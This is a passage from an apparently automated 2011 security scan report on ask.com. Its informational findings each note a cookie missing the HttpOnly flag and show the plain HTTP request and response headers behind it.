Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM2OjU1LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:36:55 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>About Ask.com: Help Center</title>


<link href="http://
...[SNIP]...

8.69. http://www.ask.com/about/help/webmasters  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /about/help/webmasters

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/help/webmasters HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/about/help
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM3OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TklnTgpcQDYAAEsEKyYAAAD-
from-tr: trafrt006iad.io.askjeeves.info
Content-Length: 48732
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:37:02 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM3OjAyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:37:02 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>About Ask.com: Webmasters</title>


<link href="http://w
...[SNIP]...

8.70. http://www.ask.com/about/legal/ask-site-policies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /about/legal/ask-site-policies

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/legal/ask-site-policies HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/about/legal/privacy
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjMyLVVUQw%3D%3D&po=0&pp=dir; qc=0; wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TklnRgpcQXEAAHdxrIgAAAAW
from-tr: trafrt003iad.io.askjeeves.info
Cache-Control: private
Content-Length: 49517
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:36:54 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM2OjU0LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:36:54 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>About Ask.com: Ask Site Policies</title>


<link href="h
...[SNIP]...

8.71. http://www.ask.com/about/legal/privacy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /about/legal/privacy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/legal/privacy HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; qc=0; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjA2LVVUQw%3D%3D&po=0&pp=dir; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllOgpcQKMAAFY@qX8AAAEd
from-tr: trafrt011iad.io.askjeeves.info
Cache-Control: private
Content-Length: 46328
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:11 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjEwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>About Ask.com: Privacy Policy</title>


<link href="http
...[SNIP]...

8.72. http://www.ask.com/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /news

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news?o=0&l=dir&qsrc=168&q=xss HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictures?o=0&l=dir&qsrc=167&q=xss&v=14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjQ4LVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllCApcQXAAAHyEWgcAAABd
from-tr: trafrt002iad.io.askjeeves.info
Cache-Control: private
Content-Length: 77175
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:27:20 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI3OjIwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:27:20 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...

8.73. http://www.ask.com/pictures  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pictures?o=0&l=dir&qsrc=167&q=xss&v=14 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/web?q=xss&search=&qsrc=0&o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjM5LVVUQw%3D%3D&po=0&pp=dir; qc=0; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; wz_sid=084EE34C926D4254193520127E77B26A; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.2.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: Tklk8ApcQKMAAFY@f2wAAAEE
from-tr: trafrt011iad.io.askjeeves.info
Content-Length: 115264
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:26:56 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjU2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:26:56 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...

8.74. http://www.ask.com/products/display  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /products/display

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /products/display HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjUxLVVUQw%3D%3D&po=0&pp=dir; qc=0; wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllMQpcQKMAAFY@o5AAAAEL
from-tr: trafrt011iad.io.askjeeves.info
Content-Length: 39615
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:01 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAxLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:01 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>Advertise - Ask.com</title>


<link href="http://www.ask
...[SNIP]...

8.75. http://www.ask.com/settings  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /settings

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /settings HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0; __qca=P0-1861158471-1313432937925

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllNwpcQDgAACSmEQcAAADE
from-tr: trafrt008iad.io.askjeeves.info
Cache-Control: no-cache
Content-Length: 65232
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:07 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjA3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:07 GMT; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...

8.76. http://www.ask.com/staticcontent/about/helpcenter/about_helpcenter_helpcenter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /staticcontent/about/helpcenter/about_helpcenter_helpcenter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /staticcontent/about/helpcenter/about_helpcenter_helpcenter HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/about/help
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM2OjU1LVVUQw%3D%3D&po=0&pp=dir; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 1301
Content-Type: text/html;charset=UTF-8
tr-request-id: TklnSQpcQDcAAAZVDvMAAAAj
from-tr: trafrt007iad.io.askjeeves.info
Cache-Control: private
APP_REQUEST_ID: TklnSQpcQHUAAB19IDIAAAAU
tsid: 0a5c4075
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:36:57 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM2OjU3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:36:57 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<title>Help Center</title>
<style type="text/css">
.txt_xlg {
font-size: 153.9%;

...[SNIP]...

8.77. http://www.ask.com/staticcontent/about/helpcenter/about_helpcenter_webmaster  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /staticcontent/about/helpcenter/about_helpcenter_webmaster

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /staticcontent/about/helpcenter/about_helpcenter_webmaster HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/about/help/webmasters
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM3OjAyLVVUQw%3D%3D&po=0&pp=dir; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Content-Length: 18494
tr-request-id: TklnUApcQDcAAAZVEpMAAAAZ
from-tr: trafrt007iad.io.askjeeves.info
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:37:04 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM3OjA0LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:37:04 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<title>For Webmasters</title>
<style type="text/css">
.txt_xlg {
font-size: 153.9%;

...[SNIP]...

8.78. http://www.ask.com/staticcontent/about/legal/about_legal_notices  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /staticcontent/about/legal/about_legal_notices

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /staticcontent/about/legal/about_legal_notices HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/about/legal/ask-site-policies
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjM2OjU0LVVUQw%3D%3D&po=0&pp=dir; qc=0

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TklnRwpcQXIAABTil6UAAAEZ
from-tr: trafrt004iad.io.askjeeves.info
Content-Length: 14604
